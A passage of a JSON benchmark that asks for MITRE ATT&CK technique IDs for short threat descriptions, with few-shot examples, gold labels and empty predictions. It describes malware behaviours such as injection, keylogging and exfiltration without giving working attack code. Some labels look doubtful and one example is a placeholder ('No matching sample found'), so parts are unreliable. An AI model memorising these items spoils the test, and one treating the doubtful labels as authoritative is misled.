The psfin module has a similar purpose but specifically searches for financial and point-of-sales indicators\n\t - T1047: Windows Management Instrumentation\n\t - T1074: Data Staged\n\t - T1018: Remote System Discovery\n- Text: adbupd can use a WMI script to achieve persistence.\n\t - T1546.003: Event Triggered Execution - Windows Management Instrumentation Event Subscription\n- Text: Seaduke delivery The attackers control Cozyduke via compromised websites, issuing instructions to infected machines by uploading \u201ctasks\u201d to a database file. Cozyduke will periodically contact these websites to retrieve task information to be executed on the local machine. One such task (an encoded PowerShell script) instructed Cozyduke to download and execute Seaduke from a compromised website\n\t - T1059.001: Command and Scripting Interpreter - PowerShell\n", + "input": "PoshC2 has a number of modules that use WMI to execute tasks.", + "gold": "- T1047: Windows Management Instrumentation", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Irdsnhrxxxfery64 manipulation on userinit.exe & unins000.exe Injection Technique To Increase Stealthiness After locating one of the target processes, the malware uses Process Hollowing (MITRE Technique T1093) to evasively create a new process from a legitimate source\n\t - T1055.012: Process Injection - Process Hollowing\n\t - T1057: Process Discovery\n- Text: Power Loader overwrites Explorer\u2019s Shell_TrayWnd extra window memory to redirect execution to a NTDLL function that is abused to assemble and execute a return-oriented programming (ROP) chain and create a malicious thread within Explorer.exe.\n\t - T1055.011: Process Injection - Extra Window Memory Injection\n- Text: SLOTHFULMEDIA can inject into running processes on a compromised host.\n\t - T1055: Process Injection\n", + "input": "Agent Tesla has used process hollowing to create and manipulate processes through sections of unmapped memory by reallocating that space with its malicious code.", + "gold": "- T1055.012: Process Injection - Process Hollowing", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: MuddyWater has used developed tools in Python including Out1.\n\t - T1059.006: Command and Scripting Interpreter - Python\n- Text: uses cmd.exe to run commands for enumerating the host.\n\t - T1059: Command and Scripting Interpreter\n- Text: EnvyScout can write files to disk with JavaScript using a modified version of the open-source tool FileSaver.\n\t - T1059.007: Command and Scripting Interpreter - JavaScript\n", + "input": "Donut can generate shellcode outputs that execute via Python.", + "gold": "- T1059.006: Command and Scripting Interpreter - Python", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: AADInternals can enumerate information about a variety of cloud services, such as Office 365 and Sharepoint instances or OpenID Configurations.\n\t - T1526: Cloud Service Discovery\n- Text: AADInternals can enumerate Azure AD users.\n\t - T1087.004: Account Discovery - Cloud Account\n- Text: ROADTools can enumerate Azure AD groups.\n\t - T1069.003: Permission Groups Discovery - Cloud Groups\n", + "input": "ROADTools can enumerate Azure AD applications and service principals.", + "gold": "- T1526: Cloud Service Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: ThreatNeedle has been distributed via a malicious Word document within a spearphishing email.\n\t - T1566.001: Phishing - Spearphishing Attachment\n- Text: Executive summary . The PROMETHIUM threat actor \u2014 active since 2012 \u2014 has been exposed multiple times over the past several years.. However, this has not deterred this actor from continuing and expanding their activities. The trojanized setup will install the malware and the legitimate application, which is a good way to disguise its activities. PROMETHIUM has been resilient over the years. We have no evidence that the websites of the real applications were compromised to host the malicious installer. The usage of the HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run registry key has a persistence mechanism that has been replaced by the creation of a service. If it is executed with the \"help\" parameter, it will install a service to execute itself as a service. This has a notable side effect: if rmaserv.exe is executed isolated on a sandbox (so without the parameter), the service is not created. Document search module: Mssqldbserv.xml . This module has been described before in the article here. The purpose of this tool is to parse the hard drive for files with a specific extension and create an archive with these files. SFT file creation routine Using the working directory as a base path, which in this sample case is C:\\DOCUME~1\\<USER>~1\\LOCALS~1\\Temp\\4CA-B25C11-A27BC\\, each selected file will be compressed into the file kr.zp\n\t - T1204.002: User Execution - Malicious File\n- Text: Bazar has been spread via emails with embedded malicious links.\n\t - T1566.002: Phishing - Spearphishing Link\n", + "input": "Nomadic Octopus has targeted victims with spearphishing emails containing malicious attachments.", + "gold": "- T1566.001: Phishing - Spearphishing Attachment", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: It is responsible for executing commands in cmd.exe (later down in the functions, not seen in the screenshot, it looks for cmd.exe and executes it using CreateProcessA)\n\t - T1059: Command and Scripting Interpreter\n- Text: Key takeaways: - TeamTNT is using new, open source tools to steal usernames and passwords from infected machines. The campaign has been active for approximately one month and is responsible for thousands of infections globally. Background . TeamTNT has been one of the most active threat groups since mid 2020. One of the most recent findings (June 4, 2021) came from Palo Alto researchers who discovered the TeamTNT Chimaera repository. TeamTNT C&C website showing infection statistics . Figure 2. The full list of supported programs can be found on the Lazagne page on Github. Windows module - persistence . Kubernetes root payload component . This component is mainly responsible for installing a cryptocurrency miner on infected devices, allowing the attacker to connect remotely to the system using SSH. Decoded shell script . TeamTNT IRC bot . As described previously this year by Lacework, TeamTNT includes ZiggyStartux in their IRC bot. IRC Bot available commands . TeamTNT AWS stealer . Similar to the other TeamTNT components, the AWS stealer (see figure 11) first installs missing dependencies. Conclusion . AT&T Alien Labs has discovered new malicious files distributed by the threat actor TeamTNT\n\t - T1518.001: Software Discovery - Security Software Discovery\n- Text: Once the target\u2019s machine is compromised, the attacker first enumerates all processes running in the system and all services. Then the attacker looks for all administrator accounts on both the local machine and the network. This reflects the Poseidon Group\u2019s familiarity with Windows network administration\n\t - T1057: Process Discovery\n\t - T1007: System Service Discovery\n", + "input": "DarkComet can list active processes running on the victim\u2019s machine.", + "gold": "- T1057: Process Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: When the actor modifies the file and changes the modification_time, the Trojan downloads the contents from the file by creating an HTTP request to a URL structured as follows: + + \u201c?alt=media\u201d The Trojan processes the downloaded data within the file the same way it would to obtain a job from data received from the DNS tunneling channel using the TXT query mode, specifically by searching the data using the following regular expression: ([^r-v\\\\s]+)[r-v]([\\\\w\\\\d+\\\\/=]+).(||) The Trojan function splits the matching data, specifically the subdomain on a separator that is a character between r and v and uses the data before the separator to get the sequence number and a Boolean value (0 or 1) if more data is expected\n\t - T1074: Data Staged\n\t - T1041: Exfiltration Over C2 Channel\n\t - T1048: Exfiltration Over Alternative Protocol\n\t - T1486: Data Encrypted for Impact\n- Text: The Cannon Trojan is written in C# and functions primarily as a downloader that relies on emails to communicate between the Trojan and the C2 server. To communicate with the C2 server, the Trojan will send emails to specific email addresses via SMTPS over TCP port 587\n\t - T1041: Exfiltration Over C2 Channel\n- Text: Wizard Spider has exfiltrated victim information using FTP.\n\t - T1048.003: Exfiltration Over Alternative Protocol - Exfiltration Over Unencrypted Non-C2 Protocol\n", + "input": "Chaes has exfiltrated its collected data from the infected machine to the C2, sometimes using the MIME protocol.", + "gold": "- T1048: Exfiltration Over Alternative Protocol", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Milan can enumerate the targeted machine's name and GUID.\n\t - T1082: System Information Discovery\n- Text: In another update, the P8RAT sample from August 2020 looks for two process names (\u201cVBoxService.exe\u201d and \u201cvmtoolsd.exe\u201d) on the victim\u2019s system, to detect VMware or VirtualBox environments at the beginning of its main malicious function\n\t - T1497.001: Virtualization/Sandbox Evasion - System Checks\n- Text: Hacking Team UEFI Rootkit is a UEFI BIOS rootkit developed by the company Hacking Team to persist remote access software on some targeted systems.\n\t - T1014: Rootkit\n\t - T1542.001: Pre-OS Boot - System Firmware\n", + "input": "HALFBAKED can obtain information about the OS, processor, and BIOS.", + "gold": "- T1082: System Information Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Using Frame1_Layout for macro execution and using lesser known API calls for shellcode execution is known to be used by Lazarus. We also were able to find infrastructure overlap between this campaign and past campaigns of Lazarus (Figure 19\n\t - T1106: Native API\n- Text: ThiefQuest uses AppleScript's \"osascript -e\" command to launch ThiefQuest's persistence via Launch Agent and Launch Daemon.\n\t - T1059.002: Command and Scripting Interpreter - AppleScript\n- Text: Lazarus Group has used WMIC to execute a remote XSL script to establish persistence.\n\t - T1220: XSL Script Processing\n", + "input": "FatDuke can call \"ShellExecuteW\" to open the default browser on the URL localhost.", + "gold": "- T1106: Native API", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: In cases where spam attachments could be verified \u2014 once a user has opened the attachment and enabled macro functionality \u2014 a PowerShell script downloads either Emotet, Bokbot or Trickbot, with the end payload being TrickBot\n\t - T1566.001: Phishing - Spearphishing Attachment\n- Text: APT32 has attempted to lure users to execute a malicious dropper delivered via a spearphishing attachment.\n\t - T1204.002: User Execution - Malicious File\n- Text: Earth Lusca has sent spearphishing emails to potential targets that contained a malicious link.\n\t - T1566.002: Phishing - Spearphishing Link\n", + "input": "BITTER has sent spearphishing emails with a malicious RTF document or Excel spreadsheet.", + "gold": "- T1566.001: Phishing - Spearphishing Attachment", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: APT37 has used malware that will issue the command \"shutdown /r /t 1\" to reboot a system after wiping its MBR.\n\t - T1529: System Shutdown/Reboot\n- Text: The last one is used by this setup, and in this mode the ransomware encrypts the files on all available mapped network drives\n\t - T1486: Data Encrypted for Impact\n\t - T1564.006: Hide Artifacts - Run Virtual Instance\n- Text: No matching sample found for T1578.004\n", + "input": "Maze has issued a shutdown command on a victim machine that, upon reboot, will run the ransomware within a VM.", + "gold": "- T1529: System Shutdown/Reboot", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Rocke's miner, \"TermsHost.exe\", evaded defenses by injecting itself into Windows processes, including Notepad.exe.\n\t - T1055.002: Process Injection - Portable Executable Injection\n- Text: To deploy the file injector, the instrumentor downloads additional payloads to be injected into a benign process\n\t - T1055.012: Process Injection - Process Hollowing\n- Text: injects into other processes to load modules.\n\t - T1055: Process Injection\n", + "input": "Gorgon Group malware can download a remote access tool, ShiftyBug, and inject into another process.", + "gold": "- T1055.002: Process Injection - Portable Executable Injection", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: APT29 has used HTTP for C2 and data exfiltration.\n\t - T1071.001: Application Layer Protocol - Web Protocols\n- Text: During Operation Honeybee, the threat actors uploaded stolen files to their C2 servers.\n\t - T1041: Exfiltration Over C2 Channel\n- Text: FlawedAmmyy may obfuscate portions of the initial C2 handshake.\n\t - T1001: Data Obfuscation\n", + "input": "Dridex has used POST requests and HTTPS for C2 communications.", + "gold": "- T1071.001: Application Layer Protocol - Web Protocols", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: FIN8 has injected malicious code into a new svchost.exe process.\n\t - T1055.004: Process Injection - Asynchronous Procedure Call\n- Text: hollows out a newly created process RegASM.exe and injects its payload into the hollowed process.\n\t - T1055.012: Process Injection - Process Hollowing\n- Text: Once unpacked, the malware creates a copy of its own process with a suspended thread and injects the unpacked code into the new process before calling the ResumeThread API. Breaking on this function call in a debugger allows an analyst to dump the process and extract the unpacked Karagany binary for further analysis\n\t - T1055.003: Process Injection - Thread Execution Hijacking\n", + "input": "Saint Bot has used different API calls, including `GetProcAddress`, `VirtualAllocEx`, `WriteProcessMemory`, `CreateProcessA`, and `SetThreadContext`.", + "gold": "- T1106: Native API", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Turla has many names in the information security industry \u2014 it is also known as Snake, Venomous Bear, Uroburos and WhiteBear. Turla likes to use compromised web servers and hijacked satellite connections for their command and control (C2) infrastructure. Instead, they use a compromised system inside the targeted network as a proxy, which forwards the traffic to the real C2 server. Well-known malware like Crutch or Kazuar are attributed to Turla. Lately, we have also seen research that has shown potential links between the Sunburst backdoor and Turla. Not every campaign run by Turla can clearly be attributed to them\n\t - T1090.001: Proxy - Internal Proxy\n- Text: By using DoH, attackers can hide DNS queries from C&C domains. If SSL/TLS traffic is not being inspected using man-in-the-middle (MitM) techniques, DNS queries to the C&C server will therefore go unnoticed. \n\t - T1572: Protocol Tunneling\n- Text: The screenshot in Figure 8 of the inf method within a Cannon sample (SHA256: 4405cfbf28\u2026) shows the information gathered that is exfiltrated to the C2 via email, specifically with RunningPlace and LogicalDrives header strings: Figure 8 inf method used by Cannon When comparing the two Cannon variants, we found a method within a Delphi Cannon sample (SHA256: 5a02d4e5f6\u2026) showing the use of Running place and Logical_Drivers as header strings to the system information it is collecting and sending to the C2 via email\n\t - T1071: Application Layer Protocol\n", + "input": "APT29 has used SSH port forwarding capabilities on public-facing systems, and configured at least one instance of Cobalt Strike to use a network pipe over SMB during the 2020 SolarWinds intrusion.", + "gold": "- T1090.001: Proxy - Internal Proxy", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Kwampirs collects password policy information with the command \"net accounts\".\n\t - T1201: Password Policy Discovery\n- Text: The actors used the ntdsutil.exe utility, which was present on a target's Active Directory\u00ae server to export the Active Directory database for credential access.\n\t - T1003.003: OS Credential Dumping - NTDS\n- Text: LockerGoga has been observed changing account passwords and logging off current users.\n\t - T1531: Account Access Removal\n", + "input": "Chimera has used the NtdsAudit utility to collect information related to accounts and passwords.", + "gold": "- T1201: Password Policy Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: As Hui explains, this happens because ngrok.io URLs stay online for only around 12 hours, and by the time security researchers identify a new C&C URL, the ngrok.io link changes to a new one, hiding the botnet from researchers once more. This allows the botnet to survive more than other botnets that host C&C servers on popular hosting platforms where security firms can usually intervene via abuse requests\n\t - T1568.002: Dynamic Resolution - Domain Generation Algorithms\n- Text: S-Type primarily uses port 80 for C2, but falls back to ports 443 or 8080 if initial communication fails.\n\t - T1008: Fallback Channels\n- Text: Historically, the group has employed the use of a series of phishing origin points, abusing access first at one university and then another\n\t - T1583.001: Acquire Infrastructure - Domains\n", + "input": "Ursnif has used a DGA to generate domain names for C2.", + "gold": "- T1568.002: Dynamic Resolution - Domain Generation Algorithms", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: At the beginning of 2017, Silent Librarian began to regularly obtain free Let\u2019s Encrypt SSL certificates for their phishing pages. This technique, which we have previous discussed at length in blog posts from November and December, is used to create more realistic-looking phishing pages\n\t - T1588.004: Obtain Capabilities - Digital Certificates\n- Text: Ecipekac has used a valid, legitimate digital signature to evade detection.\n\t - T1553.002: Subvert Trust Controls - Code Signing\n- Text: Firstly, the reason this has been named MirageFox instead of just Mirage, is because in the Export directory for the modules, the name field is filled with a string MirageFox_Server.dat\n\t - T1036: Masquerading\n", + "input": "For Operation Honeybee, the threat actors stole a digital signature from Adobe Systems to use with their MaoCheng dropper.", + "gold": "- T1588.004: Obtain Capabilities - Digital Certificates", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Mythic can leverage a modified SOCKS5 proxy to tunnel egress C2 traffic.\n\t - T1090.002: Proxy - External Proxy\n- Text: Higaisa discovered system proxy settings and used them if available.\n\t - T1090.001: Proxy - Internal Proxy\n- Text: identifies a proxy server if it exists and uses it to make HTTP requests.\n\t - T1090: Proxy\n", + "input": "APT39 has used various tools to proxy C2 communications.", + "gold": "- T1090.002: Proxy - External Proxy", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Pupy can user PowerView to execute \u201cnet user\u201d commands and create local system accounts.\n\t - T1136.001: Create Account - Local Account\n- Text: xCaon has added persistence via the Registry key \"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\load\" which causes the malware to run each time any user logs in.\n\t - T1547: Boot or Logon Autostart Execution\n- Text: Helminth creates folders to store output from batch scripts prior to sending the information to its C2 server.\n\t - T1074.001: Data Staged - Local Data Staging\n", + "input": "S-Type may create a temporary user on the system named `Lost_{Unique Identifier}` with the password `pond~!@6\u201d{Unique Identifier}`.", + "gold": "- T1136.001: Create Account - Local Account", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: APT28 sent spearphishing emails which used a URL-shortener service to masquerade as a legitimate service and to redirect targets to credential harvesting sites.\n\t - T1566.002: Phishing - Spearphishing Link\n- Text: To illustrate a real example of how this worked and looked to a website visitor, the following section will use one of the few pages of the fake site baomoivietnam[.]com that was designed to profile visitors and deliver malware or a phishing link. On this site, a news story (https://www.baomoivietnam[.]com/dai-hoc-ton-duc-thang-hieu-truong-lam-quyen-de-xay-ra-sai-pham/) about an investigation into potential improper conduct by a university professor in Vietnam contained malicious content. Once the page was accessed, a special OceanLotus server on the hostname cdn.arbenha[.]com would be leveraged to load malicious JavaScript to load a fake video player. At first, the page would display a dialog indicating that the video was loading (\u0110ang t\u1ea3i) as shown in Figure 1 below\n\t - T1598.003: Phishing for Information - Spearphishing Link\n- Text: This activity has TTP and targeting overlap with previous activity, suspected to be APT29. The 2018 and 2016 LNK files are similar in structure and code, and contain significant metadata overlap, including the MAC address of the system on which the LNK was created\n\t - T1204.001: User Execution - Malicious Link\n\t - T1566.001: Phishing - Spearphishing Attachment\n", + "input": "APT32 has sent spearphishing emails containing malicious links.", + "gold": "- T1566.002: Phishing - Spearphishing Link", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Squirrelwaffle has decrypted files and payloads using a XOR-based algorithm.\n\t - T1140: Deobfuscate/Decode Files or Information\n- Text: Volatile Cedar has used DirBuster and GoBuster to brute force web directories and DNS subdomains.\n\t - T1595.003: Active Scanning - Wordlist Scanning\n- Text: Our analysis shows that the Crimson RAT malware is compiled as a .NET binary with minimal obfuscation. This could indicate that the cybercriminal group behind this campaign is possibly not well-funded.\n\t - T1140: Deobfuscate/Decode Files or Information\n\t - T1001: Data Obfuscation\n\t - T1588.001: Obtain Capabilities - Malware\n\t - T1587.001: Develop Capabilities - Malware\n", + "input": "NOKKI uses a unique, custom de-obfuscation technique.", + "gold": "- T1140: Deobfuscate/Decode Files or Information", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: FIN10 has used Meterpreter to enumerate users on remote systems.\n\t - T1033: System Owner/User Discovery\n- Text: Saint Bot has conducted system locale checks to see if the compromised host is in Russia, Ukraine, Belarus, Armenia, Kazakhstan, or Moldova.\n\t - T1614: System Location Discovery\n- Text: Magic Hound has collected .PST archives.\n\t - T1114.001: Email Collection - Local Email Collection\n", + "input": "DarkWatchman has collected the username from a victim machine.", + "gold": "- T1033: System Owner/User Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Apart from being a flexible and easy-to-use scripting language, BLADABINDI\u2019s use of AutoIt is notable. It uses AutoIt (the FileInstall command) to compile the payload and the main script into a single executable, which can make the payload \u2014 the backdoor \u2014 difficult to detect\n\t - T1027.004: Obfuscated Files or Information - Compile After Delivery\n- Text: Remexi performs exfiltration over BITSAdmin, which is also used for the C2 channel.\n\t - T1041: Exfiltration Over C2 Channel\n- Text: APT28 deployed the open source tool Responder to conduct NetBIOS Name Service poisoning, which captured usernames and hashed passwords that allowed access to legitimate credentials. APT28 close-access teams have used Wi-Fi pineapples to intercept Wi-Fi signals and user credentials.\n\t - T1040: Network Sniffing\n", + "input": "FoggyWeb can compile and execute source code sent to the compromised AD FS server via a specific HTTP POST.", + "gold": "- T1027.004: Obfuscated Files or Information - Compile After Delivery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: APT3 has used a keylogging tool that records keystrokes in encrypted files.\n\t - T1056.001: Input Capture - Keylogging\n- Text: ESET researchers have discovered several previously undocumented post-compromise tools used by the highly active Gamaredon threat group in various malicious campaigns. One tool, a VBA macro targeting Microsoft Outlook, uses the target\u2019s email account to send spearphishing emails to contacts in the victim\u2019s Microsoft Office address book. We also analyzed further Gamaredon tools that have the ability to inject malicious macros and remote templates into existing Office documents\n\t - T1039: Data from Network Shared Drive\n\t - T1204.002: User Execution - Malicious File\n\t - T1534: Internal Spearphishing\n\t - T1083: File and Directory Discovery\n- Text: SYNful Knock is malware that is inserted into a network device by patching the operating system image.\n\t - T1601.001: Modify System Image - Patch System Image\n", + "input": "When it first starts, BADNEWS spawns a new thread to log keystrokes.", + "gold": "- T1056.001: Input Capture - Keylogging", + "predicted": "" + }, + { + "instruction": 